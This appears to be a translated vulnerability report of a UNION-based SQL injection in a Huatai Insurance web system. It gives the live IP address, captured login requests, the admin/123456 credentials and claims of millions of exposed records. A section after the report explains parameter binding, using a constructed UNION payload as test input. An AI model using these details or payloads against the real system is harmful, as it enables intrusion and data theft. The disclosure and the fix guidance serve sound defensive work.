SQL injection vulnerability in a Huatai Insurance system (UNION-based, involving millions of data records)
SQL injection vulnerability (supports UNION; millions of data records). Check whether this SQL injection vulnerability rates 20 rank.
Huatai insurance integrated out-of-order system
http://202.108.103.161:9999/htcsp/
Packets captured when logging on:
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getMac HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://202.108.103.161:9999/htcsp/
Accept-Language: zh-cn
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: 202.108.103.161:9999
Content-Length: 15
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52A

username=system
Millions of data records.
10,000+ users.
All their passwords are weak.
The injection at logon is as follows:
POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=getBranch HTTP/1.1
Host: 202.108.103.161:9999
Connection: keep-alive
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://202.108.103.161:9999
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://202.108.103.161:9999/htcsp/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=68FEDD38D5B21C563F64CF28708CD04C

username=admin

POST http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcom HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://202.108.103.161:9999/htcsp/ShakeHandsAction.do?cmd=loginWelcom
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 72
Host: 202.108.103.161:9999
Pragma: no-cache
Cookie: JSESSIONID=122D50C621DA805034DB8DA6F887A52A

username=admin&password=123456&comcode=&yanzhengma=EW84&yanzhengTrue=false
In fact, the packets are similar, with just a few more parameters.
Solution:
It goes without saying.
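
An added example, not code from the affected application or from the original report: the standard fix for an injectable username lookup like the pre-login requests above is to bind the parameter instead of concatenating it into the SQL text. The table, columns, function names and sample data are hypothetical and constructed here, using an in-memory SQLite database.

```python
import sqlite3

def make_db():
    """Constructed in-memory data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT, branch TEXT);
        INSERT INTO users VALUES ('admin',  'pw-admin',  'HQ');
        INSERT INTO users VALUES ('system', 'pw-system', 'OPS');
    """)
    return db

def get_branch_concat(db, username):
    """'Before': the request parameter is pasted into the SQL text."""
    sql = "SELECT branch FROM users WHERE username = '" + username + "'"
    return [row[0] for row in db.execute(sql)]

def get_branch_bound(db, username):
    """'After': the parameter is bound, so it is only ever compared as data."""
    sql = "SELECT branch FROM users WHERE username = ?"
    return [row[0] for row in db.execute(sql, (username,))]

# Constructed regression input: a username value carrying a UNION clause.
UNION_INPUT = "nobody' UNION SELECT password FROM users --"

def regression_check():
    """Run both lookups on a normal and a UNION-bearing username."""
    db = make_db()
    return {
        "concat_normal": get_branch_concat(db, "admin"),
        "bound_normal": get_branch_bound(db, "admin"),
        # Concatenated query returns rows from another column.
        "concat_union": sorted(get_branch_concat(db, UNION_INPUT)),
        # Bound query finds no user with that literal name.
        "bound_union": get_branch_bound(db, UNION_INPUT),
    }

if __name__ == "__main__":
    for name, rows in regression_check().items():
        print(name, rows)
```

The same binding applies to every parameter of the login request (username, password, comcode), and the check in `regression_check` can be kept as a unit test so a later change back to string concatenation fails the build.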